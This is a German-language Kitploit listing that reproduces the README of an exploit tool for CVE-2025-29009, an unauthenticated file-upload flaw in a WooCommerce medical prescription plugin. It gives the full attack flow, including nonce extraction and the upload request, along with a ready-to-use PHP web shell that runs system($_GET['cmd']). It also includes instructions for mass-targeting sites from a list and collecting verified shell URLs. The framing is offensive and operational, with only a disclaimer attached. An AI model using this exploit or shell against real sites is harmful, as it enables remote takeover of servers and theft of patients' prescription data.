Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-29009 — WordPress Medical Prescription Attachment Plugin for WooCommerce Plugin <= 1.2.3 ist anfällig für einen hochprioritären beliebigen Datei-Upload. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-29009
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-29009

CVE-2025-29009

WordPress Medical Prescription Attachment Plugin for WooCommerce Plugin <= 1.2.3 ist anfällig für einen hochprioritären beliebigen Datei-Upload.

Repository anzeigen
111vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-29009

Das WordPress Medical Prescription Attachment Plugin für WooCommerce Plugin <= 1.2.3 ist anfällig für einen hochprioritär beliebigen Datei-Upload

CVE-2025-29009

Webkul Medical Prescription Attachment — Unrestricted File Upload → Web Shell

root@kitploit:~
,-. .   , ,--.     ,-.   ,-.  ,-.  ;--'     ,-.   ,-.   ,-.   ,-.   ,-.
/    |  /  |           ) /  /\    ) |           ) (   ) /  /\ /  /\ (   )
|    | /   |-   ---   /  | / |   /  `-.  ---   /   `-'| | / | | / |  `-'|
\    |/    |         /   \/  /  /      )      /       / \/  / \/  /     /
 `-' '     `--'     '--'  `-'  '--' `-'      '--'  `-'   `-'   `-'   `-'

CVE Plugin Auth

Python
Author

❶ Schwachstelle

FeldDetail
CVECVE-2025-29009
PluginWebkul Medical Prescription Attachment Plugin for WooCommerce
BetroffenAlle Versionen ≤ 1.2.3
AuthentifizierungKeine erforderlich
TypUnrestricted Upload of File with Dangerous Type → Web Shell Upload
CWECWE-434 · Unrestricted Upload of File with Dangerous Type

Ursache:
Der AJAX-Handler wkwcpa_handle_prescription_session (action=wkwcpa_handle_prescription_session) akzeptiert Datei-Uploads über wkwc_pa_prescription_attachment[], ohne die Dateierweiterung oder den MIME-Typ serverseitig zu validieren. Ein nicht authentifizierter Angreifer kann das ajaxNonce aus der öffentlichen WooCommerce-Storefront extrahieren (eingebettet im JavaScript-Objekt wkwcpaFrontObj) und dann eine PHP-Web-Shell direkt in das Upload-Verzeichnis des Servers hochladen. Die Antwort gibt die vollständige erreichbare URL der hochgeladenen Datei zurück.


❷ Angriffsablauf

root@kitploit:~
┌──────────────────────────────────────────────────────────────┐
│  1. Startseite auflösen                                     │
│     GET /  →  GET /shop/  →  GET /product/  →  GET /?wkwcpa=1│
│                                                              │
│  2. Nonce extrahieren                                       │
│     Parse wkwcpaFrontObj.ajax.ajaxUrl                       │
│     Parse wkwcpaFrontObj.ajax.ajaxNonce                     │
│                                                              │
│  3. Shell hochladen                                         │
│     POST <ajaxUrl>                                          │
│       action = wkwcpa_handle_prescription_session            │
│       nonce  = <ajaxNonce>                                  │
│       type   = upload                                       │
│       wkwc_pa_prescription_attachment[] = shell.php         │
│                                                              │
│  4. Antwort parsen                                          │
│     JSON → data.attachments_img_html[].src  →  Shell-URL    │
│                                                              │
│  5. Shell verifizieren                                      │
│     GET <shell_url>  →  Prüfung auf eindeutige Signatur     │
│                                                              │
│  6. In shells.txt speichern                                 │
└──────────────────────────────────────────────────────────────┘

❸ Einrichtung

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-29009.git
cd CVE-2025-29009
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

❹ Shell-Vorbereitung

Erstelle deine PHP-Shell und bette eine eindeutige Signaturzeichenfolge ein, damit das Tool die erfolgreiche Ausführung überprüfen kann:

root@kitploit:~
<?php
// NxploitedShellOK
system($_GET['cmd']);
?>

Speichere es als shell.php im selben Verzeichnis wie das Skript.
Die Zeichenfolge NxploitedShellOK ist die Signatur — sie muss in der Antwort der Shell erscheinen, damit die Verifizierung bestanden wird.


❺ Verwendung

root@kitploit:~
python3 CVE-2025-29009.py

Eingabeaufforderungen

root@kitploit:~
Zieldatei (Standard list.txt):              list.txt
Threads (Standard 10):                      10
Lokaler Shell-Dateiname (z.B. shell.php):   shell.php
Eindeutige Shell-Signatur (z.B. NxploitedShellOK): NxploitedShellOK

Zielformat — list.txt

root@kitploit:~
https://target1.com
target2.com
http://target3.com

Ziele ohne http:// oder https:// werden automatisch mit http:// versehen.


❻ Ausgabe

DateiInhalt
shells.txtEine verifizierte Shell-URL pro Zeile

Terminal:

root@kitploit:~
[SHELL]  https://target.com/wp-content/uploads/2025/06/shell.php
[FAIL]   https://target2.com  (nonce_not_found)
[FAIL]   https://target3.com  (success_false)
[Status] 3/3  OK:1  FAIL:2

❼ Fehlercodes

CodeBedeutung
shell_file_missingshell.php nicht im Arbeitsverzeichnis gefunden
no_front_pageKeine Kandidatenseite hat HTTP 200 zurückgegeben
nonce_not_foundwkwcpaFrontObj auf keiner Seite vorhanden
upload_errorNetzwerkfehler während des POST
json_parse_errorAntwort ist kein gültiges JSON
success_falseServer hat data.success = false zurückgegeben
no_attachmentsUpload erfolgreich, aber keine URL in der Antwort
shell_url_not_foundDatei-URL konnte nicht aus dem Antwort-HTML geparst werden

❽ Autor

root@kitploit:~
Nxploited
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


❾ Haftungsausschluss

root@kitploit:~
NUR FÜR AUTORISIERTE SICHERHEITSFORSCHUNG UND BILDUNGSZWECKE.

Der Autor übernimmt keine Verantwortung für die Nutzung gegen Systeme,
die der Betreiber nicht besitzt oder für die er keine ausdrückliche schriftliche
Erlaubnis zum Testen hat.

Unbefugte Nutzung verstößt gegen das CFAA, CMA und gleichwertige Gesetze weltweit.
Du allein bist für deine Handlungen verantwortlich.

© 2025 Nxploited · Medical Prescription Attachment ≤ 1.2.3 · Behoben in 1.2.4

Tool herunterladen